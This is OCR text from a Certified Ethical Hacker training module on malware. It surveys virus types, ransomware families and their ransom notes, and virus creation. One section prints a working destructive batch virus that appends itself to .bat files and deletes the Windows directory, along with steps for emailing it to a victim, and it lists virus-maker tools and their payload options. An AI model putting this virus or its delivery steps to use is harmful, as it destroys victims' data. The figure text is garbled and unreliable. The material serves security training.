File Viruses File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident viruses.
File viruses insert their code into the original file and infect executable files. Such viruses are numerous, albeit rare. They infect in a variety of ways and are found in numerous file types. Module 07 Page 1033 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
The most common type of file virus operates by identifying the file type it can infect most easily, such as that with filenames ending in .COM or .EXE. During program execution, the virus executes along with program files to infect more files. Overwriting a virus is not easy, as the overwritten programs no longer function properly. These viruses tend to be found immediately. Before inserting their code into a program, some file viruses save the original instructions and allow the original program to execute, so that everything appears normal. File viruses hide their presence using stealth techniques to reside in a computer’s memory in the same way as system sector viruses. They do not show any increase in file length while performing directory listing. If a user attempts to read the file, the virus intercepts the request, and the user gets back his original file. File viruses can infect many file types, as a wide variety of infection techniques exist.
Attacker Figure 7.39: Working of file virus
Multipartite Viruses A multipartite virus (also known as a multipart virus or file infectors and boot record infectors and attempts sector and the executable or program files. When the turn, affect the system files and vice versa. This type of is not rooted out entirely from the target machine.
hybrid virus) combines the approach of to simultaneously attack both the boot virus infects the boot sector, it will, in virus re-infects a system repeatedly if it
Macro Viruses
Macro viruses infects Microsoft Word or similar applications by automatically performing a sequence of actions after triggering an application. Most macro viruses are written using the macro language Visual Basic for Applications (VBA), and they infect templates or convert infected documents into template files while maintaining their appearance of common document files. Macro viruses are somewhat less harmful than other viruses. They usually spread via email. Pure data files do not allow the spreading of viruses, but sometimes, the average user, due to the extensive macro languages used in some programs, easily overlooks the line between a data file and an executable file. In most cases, just to make things easy for users, the line between a data file and a program starts to blur only when the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit universal programs with macro capability, such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code.
Module 07 Page 1034
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
uw {at {a
sees eeeeeeeeeeeeeseeeeeeeeeeeeeesssssssss
Infects Macro Enabled Documents
>
Attacker
User Figure 7.40: Working of a macro virus
Cluster Viruses Cluster viruses infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program. Even though the changes in the directory entry may affect all the programs, only one copy of the virus exists on the disk. A cluster virus, e.g., Dir-2, first launches itself when any system, and control is then passed to the actual program.
program
starts on the
computer
This virus infection leads to severe problems if the victim does not know its exact location. If it infects memory, it controls access to the directory structure on the disk. If the victim boots from a clean USB pen drive and then runs a utility such as CHKDSK, the utility reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to correct the problem. If the offer is accepted, the virus infects all the executable files and results in the loss of original content, or all files might appear to be of the same size. Stealth Viruses/Tunneling Viruses These viruses try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. These viruses state false information to hide their presence from antivirus programs. For example, a stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code. A stealth virus hides from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the infected file with the uninfected file that is stored on the hard drive. In addition, a stealth virus hides the modifications performed by it. It takes control of the system’s functions that read files or system sectors. When another program requests information that has already modified by the virus, the stealth virus reports that information to the requesting program instead. This virus also resides in memory. To avoid detection, these viruses always take over system functions and use them to hide their
presence.
One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus attack because a Trojan installs the rootkit and is thus capable of hiding any malware.
Module 07 Page 1035 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Give me the system
Hides Infected
file tcpip.sys to scan
TCPIP.SYS
Preerrirr titi Antivirus Software
—
PPrrrrerrr rt Teri) VIRUS
Original TCPIP.SYS Figure 7.41: Working of stealth virus/tunneling virus
=
Virus Removal co
Always perform a cold boot (boot from write-protected CD or DVD)
o
Never use DOS commands such as FDISK to fix the virus
©
Use antivirus software
Encryption Viruses Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware, codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an encrypted copy of the virus and a decryption module. The decryption module remains constant, whereas the encryption makes use of different keys.
An encryption key consists of a decryption module and an encrypted copy of the code, which enciphers the virus. When the attacker injects the virus into the target machine, the decryptor will first execute and decrypt the virus body. Then, the virus body executes and replicates or becomes resident in the target machine. The replication process is successfully accomplished using the encryptor. Each virus-infected file uses a different key for encryption. These viruses employ XOR on each byte with a randomized key. The decryption technique employed is “x,” or each byte with a randomized key is generated and saved by the root virus. Encryption viruses block access to target machines or provide victims with limited access to the system. They use encryption to hide from virus scanners. The virus scanner cannot detect the encryption virus using signatures, but it can detect the decrypting module.
Module 07 Page 1036
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Encryption key 1
Encryption key 2
cee eeeeeeeeeneeeeeneeeeeseees D>
Virus Code
Encryption Virus 1
Encryption
Virus 2
Encryption Virus 3 Figure 7.42: Working of encryption virus
Sparse Infector Viruses
To spread infection, viruses typically attempt to hide from antivirus programs. Sparse infector viruses infect less often and try to minimize their probability of discovery. These viruses infect only occasionally upon satisfying certain conditions or infect only those files whose lengths fall within a narrow range. The sparse infector virus works with two approaches: =
Replicates only occasionally (e.g., every tenth program executed or on a particular day of the week)
=
Determines which file to infect based on certain conditions (e.g., infects target files with a maximum size of 128 kb)
The diagram below shows the working of a sparse infector virus.
The attacker sends a sparse infector virus to the target machine and sets a wakeup call for the virus to execute on the 15th day of every month. This strategy makes it difficult for the antivirus program to detect the virus, thus allowing the virus to infect the target machine successfully. =!
Wake up on 15** of
|
@
| \
every month and execute code Cee eee renerer
Figure 7.43: Working of sparse infector virus
Polymorphic Viruses Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a decryption module. Polymorphic viruses modify their code for each replication to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. Polymorphic mechanisms use random number generators in their implementation. Module 07 Page 1037
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
The general use of the mutation engine is to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic code prevents antivirus professionals from accessing the code. A simple integrity checker detects the presence of a polymorphic virus in the system’s disk.
A polymorphic virus consists of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code. It decrypts the code only after taking control of the computer. The mutation engine generates randomized decryption routines. Such decryption routines vary whenever the virus infects a new program. The polymorphic virus encrypts both the mutation engine and the virus code. When the user executes a polymorphic-virus-infected program, the decryptor routine takes complete control of the system, after which it decrypts the virus code and the mutation engine. Next, the decryption routine transfers the system control of the virus, which locates a new program to infect. In the Random Access Memory (RAM), the virus makes a replica of itself as well as the mutation engine. Then, the virus instructs the encrypted mutation engine to generate a new randomized decryption routine, which can decrypt the virus. Here, the virus encrypts the new copies of both the virus code and the mutation engine. Thus, this virus, along with the newly encrypted virus code and encrypted mutation engine (EME), appends the new decryption routine to a new program, thereby continuing the process.
Polymorphic viruses running on target systems are difficult to detect due to the encryption of the virus body and the changes in the decryption routine each time these viruses infect. It is difficult for virus scanners to identify these viruses, as no two infections look alike. Encrypted Mut:
Engine (EME)
Encrypted Mutation
Engine oa Encrypted Virus Code
i
|
: m Instruct 2
tocreate ?
| -@:. seneee Decryptor routine |
Decryptor Routine
4A F instruct } to create E new EME 5
new DR
fect and mutation
New Encrypted
°
e
‘Mutation Engine (EME)
Virus Code
engine
with new key
© User Runs an Infected Program
virus does the Damage RAM
Figure 7.44: Working of polymorphic virus
Metamorphic Viruses Metamorphic viruses are programmed such that they rewrite themselves completely each time they infect a new executable file. Such viruses are sophisticated and use metamorphic engines for their execution. Metamorphic code reprograms itself. It is translated into temporary code (a new variant of the same virus but with different code) and then converted back into the original code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. Metamorphic viruses are more effective than polymorphic viruses.
Module 07 Page 1038
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
The transformation of virus bodies ranges from simple to complex, depending on the technique used. Some techniques used for metamorphosing viruses are as follows: Disassembler Expander Permutator
Assembler Virus bodies are transformed in the following steps:
au F WN
1.
Inserts dead code
Reshapes expressions Reorders instructions
Modifies variable names
Encrypts program code Modifies program control structure
Variant 1
Variant 2
seed > Metamorphic Engine
Variant 3
This diagram depicts metamorphic malware variants with recorded code
Figure 7.45: Working of metamorphic virus
Overwriting File or Cavity Viruses
Some programs have empty spaces in them. Cavity viruses, also known as space fillers, overwrite a part of the host file with a constant (usually nulls), without increasing the length of the file while preserving its functionality. Maintaining a constant file size when infecting allows the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts and code complexity. A new design of a Windows file, called the Portable Executable (PE), improves the loading speed of programs. However, it leaves a particular gap in the file while it is being executed, which can be used by the cavity virus to insert itself.
Module 07 Page 1039
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Content in the file before infection Sales and marketing management is the
Content in the file after infection Null
Null
Null
Null
Null
Null
Null
Null Null Null Null Null Null
leading authority for executives in the sales 'd market tt industri and marketing management industries.
Null
The suspect, Desmond Turner, surrendered
Null
Null
Null
Null
Null
Null
Null
to authorities at a downtown
Null
Null
Null
Null
Null
Null
Null
fast-food restaurant
Indianapolis
Null Null Null Null Null Null Null
Null Null Null Null Null Null Null
Null Null Null Null Null Null
Original File Size: 45 KB
Infected File Size: 45 KB
Figure 7.46: Working of overwriting file or cavity virus
Companion/Camouflage Viruses
The companion virus stores itself with the same filename as the target program file. The virus infects the computer upon executing the file, and it modifies the hard disk data. Companion viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical COM file and infects EXE files. This is what happens. Suppose that a companion virus is executing on the PC and decides that it is time to infect a file. It looks around and happens to find a file called notepad.exe. It now creates a file called notepad.com, containing the virus. The virus usually plants this file in the same directory as the .exe file; however, it can also place it in any directory on the DOS path. If you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they are all in the same directory). The virus executes, possibly infecting more files, and then loads and executes notepad.exe. The user would probably fail to notice that something is wrong. It is easy to detect a companion virus just by the presence of the extra COM file in the system. Virus infects the system with a file notepad.com and saves it in c:\winnt\system3z2 directory
Attacker
Ct
>
Notepad.exe
®
Notepad.com
Figure 7.47: Working of companion virus/ camouflage virus
Shell Viruses The shell virus code forms a shell around the target host program’s code, making itself the original program with the host code as its sub-routine. Nearly all boot program viruses are shell viruses.
Module 07 Page 1040
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
Before Infection
o Ema 1 iid
After Infection
Figure 7.48: Working of shell virus
File Extension Viruses
File extension viruses change the extensions of files. The extension .TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think that this is a text file and open it. It actually is an executable Visual Basic Script virus file and could cause severe damage.
The guidelines to secure files against such virus infection are as follows:
=
Turn off “Hide file extensions” in Windows (Go to Control Panel > Appearance and Personalization > Show hidden files and folders > View tab > Uncheck Hide extensions for known file types).
=
Scan all the files in the system using robust antivirus software; this requires a substantial amount of time. File Explorer Options
x
General View — Search Folder views
You can apply this view (such as Details or Icons) to
al folders ofthis type. Apply to Folders
(Reset Folders
Advanced settings:
@ Display file size information in foldertips
© Display the full path in the title bar
SS Hidden files and folders
‘© Dont show hidden files, folders, or dives
O Show hidden files, folders, and drives merge:
CO Hide protected operating system files (Recommended) CO Launch folder windows in a separate process
CO Restore previous folder windows at logon
OK
Cancel
Aoply
Figure 7.49: Screenshot displaying Folder Options Window
Module 07 Page 1041
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
FAT Viruses
A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer. FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly. Many are designed to overwrite files or directories, and material on a computer can lost permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in addition to destroying data, forcing a user to reformat the computer. Essentially, a FAT virus destroys the index, thereby making it impossible for a computer to locate files. The virus can spread to files when the FAT attempts to access them, corrupting the entire computer eventually. FAT viruses often manifest in the form of corrupted files, with users noting that files are missing or inaccessible. The FAT architecture itself can also be changed; e.g., a computer that should be using the FAT32 protocol might abruptly say that it is using FAT12. Logic Bomb Viruses A logic bomb is a virus that is triggered by a response to an event, such as the launching of an application or when a specific date/time is reached, where it involves logic to execute the trigger. For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is designed to wait until you visit a website that requires you to log in with your credentials, such as a banking site or social network. Consequently, the logic bomb will be triggered to execute the keylogger, capture your credentials, and send them to a remote attacker. When a logic bomb is programmed to execute on a specific date, it is referred to as a time bomb. Time bombs are usually programmed to set off when important dates are reached, such as Christmas and Valentine’s Day. Web Scripting Viruses A web scripting virus is a type of computer security vulnerability that breaches your web browser security through a website. This allows attackers to inject client-side scripting into the web page. It can bypass access controls and steal information from the web browser. Web scripting viruses are usually used to attack sites with large populations, such as sites for social networking, user reviews, and email. Web scripting viruses can propagate slightly faster than other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send spam, damage data, and defraud users. There are two types of web scripting viruses: non-persistent and persistent. Non-persistent viruses attack you without your knowledge. In the case of a persistent virus, your cookies are directly stolen, and the attacker can hijack your session, which allows the attacker to
impersonate you and cause severe damage.
Module 07 Page 1042
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Prevention
The best ways to prevent these viruses and exploits are by safely validating untrusted HTML inputs, enforcing cookie security, disabling scripts, and using scanning services such as an antivirus program with real-time protection for your web browser. It is also beneficial to avoid unknown websites and use World of Trust to ensure that a site is safe. You would notice if you are infected with a web scripting virus if your searches are linked elsewhere and the background or homepage changes. The computer runs slowly and sluggishly, and programs may close randomly. Modern-day browsers have add-ons such as Adblock Plus, which allow users to prevent scripts from being loaded. E-mail Viruses An e-mail virus refers to computer code sent to you as an e-mail attachment, which if activated, will result in some unexpected and usually harmful effects, such as destroying specific files on your hard disk and causing the attachment to be emailed to everyone in your address book. Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or stealing personal data. Such viruses also vary in terms of how they are presented. For example, a sender of an email virus may be unknown to a user, or a subject line may be filled with nonsense. In other cases, a hacker may cleverly disguise an email to appear as if it is from a trusted or known sender. To avoid email virus attacks, you should never open (or double-click on) an e-mail attachment unless you know who sent it and what the attachment contains; in addition, you must install and use antivirus software to scan any attachment before you open it. Armored Viruses Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection. These viruses make it difficult for antivirus programs to trace the actual source of the attack. They trick antivirus programs by showing some other location even though they are actually on the system itself. The following basic techniques are adopted by armored viruses: =
Anti-disassembly Anti-disassembly is a technique that uses specially crafted code or data in a program to produce an incorrect program listing by disassembly analysis tools.
=
Anti-debugging Anti-debugging techniques are used to ensure that the program is not running under the debugger. This can slow down the process of reverse engineering, but it cannot be prevented.
=
Anti-heuristics Anti-heuristics are used in machine code to prevent heuristic analysis, and they rely on the program's ability to protect itself from programmer and debugger intervention.
Module 07 Page 1043
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Anti-emulation
Anti-emulation techniques are used to avoid dynamic analysis by fingerprinting the emulated system environment; they can also secure intellectual property against emulation-assisted reverse engineering.
=
Anti-goat Anti-goat techniques use heuristic rules to detect possible goat files such as a virus that cannot infect a file if it is too small or if it contains a large amount of do-nothing instructions. Anti-goat viruses require more time for analysis.
Add-on Viruses Add-on viruses append their code to the host code without making any changes to the latter or relocate the host code to insert their code at the beginning.
Figure 7.50: Working of add-on virus.
Intrusive Viruses Intrusive viruses overwrite the host code completely or partly with the viral code.
Figure 7.51: Working of intrusive virus
Direct Action or Transient Viruses
Direct action or transient viruses transfer all controls of the host code to where it resides in the memory. It selects the target program to be modified and corrupts it. The life of a transient virus is directly proportional to the life of its host. Therefore, transient virus executes only upon the execution of its attached program and terminates upon the termination of its attached program. At the time of execution, the virus may spread to other programs. This virus is transient or direct, as it operates only for a short period and goes directly to the disk to search for programs to infect. Terminate and Stay Resident (TSR) Viruses A terminate and stay resident (TSR) virus remains permanently in the target machine’s memory during an entire work session, even after the target host’s program is executed and terminated. The TSR virus remains in memory and therefore has some control over the processes. In general, the TSR virus incorporates interrupt vectors into its code so that when an interrupt
Module 07 Page 1044
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
occurs, the vector directs execution to the TSR code. If the TSR virus infects the system, the user needs to reboot the system to remove the virus without a trace.
The following steps are employed by TSR viruses to infect files: =
Gets control of the system
=
Assigns a portion of memory for its code
=
Transfers and activates itself in the allocated portion of memory
=
Hooks the execution of code flow to itself
=
Starts replicating to infect files
Module 07 Page 1045
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Ransomware (@
CE H
Ransomware is a type of malware that restricts access to a computer system’s files and folders and demands an online ransom
payment to the malware creator(s) to remove the restrictions
BlackCat
© erent
ow at
z
‘
Ransomware Families
BlackCat is dangerous
e e e e © e @ © @ e
ransomware that targets operating systems from
almost all vendors, including Windows, Linux, and ESXi virtual machines
me
BlackCat Ransom Note
XingLocker Conti Thanos WastedLocker RansomEXX NETWALKER QNAPCrypt Maze
Ryuk
Al Rights Reserved. Reproduction i
Ransomware (Cont'd) |
CE H
It mainly targets Windows-based devices. It
uses encryption keys such as RSA public and BlackMatter | AES keys for initializing and implementing Salsa20 encryption ]
Ransomware
Clop Ransomware DeadBolt Egregor Dharma eChOraix SamSam WannaCry
Petya - NotPetya GandCrab
MegaCortex LockerGoga NamPoHyu
Ryuk
CryptghOst
Ransomware
Ransomware is a type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions. Ransomware might encrypt files stored on the system’s hard disk or merely lock the system and display messages meant to trick the user into paying the ransom.
Module 07 Page 1046
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked websites, infected programs, app downloads from untrusted sites, vulnerabilities in network services, and so on. After execution, the payload in the ransomware runs and encrypts the victim’s data (files and documents), which can be decrypted only by the malware author. In some cases, user interaction is restricted using a simple payload. In a web browser, a text file or webpage displays the ransomware demands. The displayed messages appear to be from companies or law enforcement personnel falsely claiming that the victim’s system is being used for illegal purposes or contains illegal content (e.g., porn videos, pirated software), or it could be a Microsoft product activation notice falsely claiming that installed Office software is fake and requires product re-activation. These messages entice victims into paying money to undo the restrictions imposed on them. Ransomware leverages victims’ fear, trust, surprise, and embarrassment to get them to pay the ransom demanded. Ransomware Families Some additional ransomware families are as follows:
=
Cerber
=
RansomEXX
=
XingLocker
=
NETWALKER
=~
Conti
=
QNAPCrypt
=
Thanos
=
Maze
=
WastedLocker
=
Ryuk
Examples of Ransomware =
BlackCat BlackCat is a dreadful ransomware attack written in Rust and profoundly known as ALPHA (AlphaVM, AlphaV). It was first discovered in late November 2021. The ransomware targets almost all vendor OSes including Windows, Linux, and ESXi virtual machines. It is specially crafted ransomware comprising 4 encryption routines and supports several encryption algorithms such as ChaCha20 and AES. This ransomware is supplied as ransomware as a service (RaaS), engaging associates to operate from various locations. Using Blackcat, attackers can target various IT industries worldwide for demanding a ransom from the victims in the form of Bitcoins and Monero. The attack mainly focuses on crashing targeted devices and running processes, applications, and VMs during their encryption process. BlackCat employs phishing tactics on the victims by delivering its payload using vulnerable applications and exposed toolsets.
Module 07 Page 1047
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Aa
€
x
0
fir
x
(OGRE
ee
+
Stes
ee
20
«%
Your network was compromised. Important Files on your network was downloaded and encrypted. We used an asymmetric cipher to encrypt your files. Meaning the only way to decrypt them is to have a Private Key.
ur custom Decrypt App is bundled with your Private Key. In order to buy it you have to follow Instructions below. If you have questions please feel free to use Live Chat. ‘Act quicly to get a discount! Decrypt App Price
|
You have 4 days, 09:22:09 until:
+ Decrypt App special discount period will discontinued. be * Discount price is available until 12/14/21, 3:41 AM
Discount Price:
$3000000
Full Price:
‘$3500000
Status ‘Awaiting payment of $3000000 to one of the following wallets:
Bitcoin Monero
[e]
SAWS P SC HIRI OSK AMIR at WRK SENN DRSSHOROHERIAY
$3450000 (”) = 71.533725 BTC $3000000 = 15495.867769 XMR
a Instructions
Live Chat
Trial Decrypt
Intermediary
Figure 7.52: BlackCat ransom note
=
BlackMatter BlackMatter
considered
is dangerous
an extension
ransomware
of dreadful
written
in C. It was
ransomware
discovered
such as DarkSide
and
in 2021
and
REvil. This
ransomware mainly targets Windows devices can also compromise Linux devices using unique payloads that can be later used to develop RATs for exploiting Windows devices. The attackers mainly target organizations having high-level turnovers, excluding the companies that were already attacked using DarkSide and REvil. This ransomware uses encryption keys such as RSA public and AES keys for initializing and implementing Salsa20 encryption on the targeted files. The encryption process is crafted in such a manner that the encrypted file consists of a decrypting blob that comprises a special tool to facilitate the post-ransom money transfer by the victim. This malware is also supplied as RaaS, engaging associates to operate from various locations. BlackMatter crashes various files and closes all the other running processes and applications while encrypting the targeted files on the victim device. Using this malware, attackers can also gain control over domain controllers, ACLs, and other user access controls (UACs). Module 07 Page 1048
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
®) BlackMatter
REFRESH.
Ransomware
Now
Time to end
3,000,000
©
@ 89.91 ®
1217434
After time end
End date: 03 Aug, 21:35 PM [NY time]
We increase post with your data on our blog Go To BL0G Post Blog post
PRIVATE
6,000,000 179.83 @ 24348.67 @
timer for talks
Data size |
1024 GB: 10% for bitcoin(f you willing to pay init)
Test decryption Figure 7.53: BlackMatter ransom note
The following are some additional ransomware:
=
Clop Ransomware
=
Petya - NotPetya
=
DeadBolt
=
GandCrab
=
Egregor
=
MegaCortex
=
Dharma
=
LockerGoga
=
eChOraix
=
NamPoHyu
=
SamSam
=
Ryuk
=
WannaCry
=~
CryptghOst
Module 07 Page 1049
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
How to Infect Systems Using aVirus: Creating a Virus
CE H
Avirus can be created in two different ways:
© Writing aVirus Program ©
Using Virus Maker Tools
Send the Game.com file as
4
an email attachmentto a victim
Create a batch file
Game.bat with this text
@ Writing a Virus Program
@ echo off
for %%f in (*.bat) do copy %%£ + Game.bat del c:\Windows\*.*
v
v
Convert the Game. bat batch file to Game.com using the bat2com utility
When run, it copies itself to all the .bat files in the current directory and deletes all the files in the Windows directory,
How to Infect Systems Using aVirus: Creating a Virus (Cont’d) @ UsingVirus Maker Tools
DELmE’s Batch Virus Maker
DELME batch virus maker creates viruses that can perform tasks such as deleting files on a hard disk drive, disabling admin privileges, cleaning the registry, and killing tasks
CE H
JPS Virus Maker
2s (rus Maker 40)
Virus Maker Tools
© Bhavesh Virus Maker SKW © Deadly Virus Maker © SonicBat Batch Virus Maker © TeraBIT Virus Maker @ Andreinick05's Batch Virus Maker
How to Infect Systems Using a Virus Attackers can infect systems using a virus in the following steps: =
Creating Virus
=
Propagating and Deploying Virus
Module 07 Page 1050
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Creating a Virus A virus can be created in two ways: writing a virus program, and using virus maker tools. =
Writing a Simple Virus Program
The following steps are involved in writing a simple virus program: 1.
Create a batch file Game.bat with the following text: @ echo off
for %%f in (*.bat) do copy %%f + Game.bat del c:\Windows\*.*
=
2.
Convert the Game.bat batch file into Game.com using the bat2com utility
3.
Send the Game.com file as an email attachment to the victim
4.
When Game.com is executed by the victim, it copies itself to all the .bat files in the current directory on the target machine and deletes all the files in the Windows directory
Using Virus Maker Tools Virus maker tools allow you to customize and craft your virus into a single executable file. The nature of the virus depends on the options available in the virus maker tool. Once the virus file is built and executed, it can perform the following tasks: o
Disable Windows command prompt and Windows Task Manager
o
Shut down the system
o
Infect all executable files
©
Inject itself into the Windows registry and start up with Windows
o
Perform non-malicious activity such as unusual mouse and keyboard actions
Module 07 Page 1051 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
The following tool s are useful for testing the security of your own antivirus software. o
DELmE’s Batch Virus Maker DELmE’s Batch Virus Generator is a virus creation program with many options to infect the victim’s PC, such as formatting the C: drive, deleting all the files in the hard disk drive, disabling admin privileges, cleaning the registry, changing the home page, killing tasks, and disabling/removing the antivirus and firewall.
eo
v 2.0 DELmE’s Batch Virus Maker eI,
=
2° | Payload | other Options Local Infection Reg RuntKey | { Infec
infect All Drives
Infect Startup Folder | [ Infect Autoexecbat
es
t | [Infec Al Folders
|
| [
|
Infect "ls"Cmd
Filetype Infection Infect Al Exe Files] (Infect Al_Ink Files} (infectAl Doc Files} infect AT Fies | (infect Al Pdf Files) (_infect Al XmiFies_} InfectAl_Mp3 Fes) (“InfectAl Mp4 Files] [InfectAl_Png Files]
jemDrive’
Infect Filetype. Enter File Extension To Infect (eg ‘bt’)
(feat (fet (Gea (Gea (Gitex
{Lintect _} (_tntect_} (tte) (tea) (ites)
Intemet Spreading ‘Send To Contacts _] Sends Virus To All Contacts On Microsoft Outlook As An Email Attachment
DELmE's Batch Virus Maker Info DELmE's Batch Virus Maker.
Virus Name Veus Author
covion
Connect Trojan Fabinhoff
View Agreement} (View Credits Stat Over)
Version: 2.0 ‘Scripting Language: Autolt v3.3.0.0 Coded By: DELmE
Ee dada Nt | otetnemtesterehe nara
Please view the User Agreement by clicking the "Agreement button” and make: sure you fully understand and agree with the agreement
Figure 7.54: Screenshot of DELmE’s Batch Virus Maker
Module 07 Page 1052
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Malware Threats o
Exam 312-50 Certified Ethical Hacker
JPS Virus Maker
JPS Virus Maker tool is used to create customized viruses. It has many in-built options to create a virus. Some of the features of this tool are auto-startup, disable task manager, disable control panel, enable remote desktop, turn off Windows Defender, etc.
1x}
IPS ( Virus Maker 4.0 ) Viru:
s Options : Disable Registry
Hide Services Hide Windows
Disable MsConfig
©
x + Gi virustotalcom/gui/le/Sbb9c7 1cc58a7#3d122966d!089575a4cac573039a194220cTaStede f2d/detection
3] stsernccnarnsizanectnmnriotcacsannatiteraateta © s2engines detected thie fle
‘Sob0eT ideeSbart3a 122868eA08957Sedcoc8730390194220e7a5 tetett 2 subse? essa7tndazacccaDeRs7SotcacS7IEQB4 194220 TaStete tad ex [020170160 ve2017.8570 expo hatter nauk)
DETECTION
‘Ave (n0 os)
DETAILS
RELATIONS
«BEHAVIOR
427K 2020-08-20.08:5208 UTC a tminior ge thames a
«COMMUNITY@
@ Toojan Exploit. MSOMceWvord GenerckD.
@ cre;cve2017-8570
© Seer cve2017-8570.9
© Trojan expo MBOMRCeWord Generics
© ower ttamore-gen[i
© OtrerMolware-gon
© Exrreve-2017-8570.Gen
© woa2.eeplot HTM Downloaders
© Trojn Expiot MSOMee eed GenerckO.
© SxpRTeCve-2017.85704
© xmantatware Squibydoo 67288330
@ Marwareepazazmimotoytt
© ©¥€-2017-0199. gentcameot
© Expt Siogen 63608
Trojan Expiot MSOReeWVerd GenerickO,
© TcjanExpon MEORCeWerd GenesekD.
Explot EXPICVE-2017-8570.Gen
© Trojan DownloaderDOE Gens
HTMLBaMiner PUTA
© Troan €xpion someon ~“@
HEUR Trojan-Downtoader MSExce! Des,
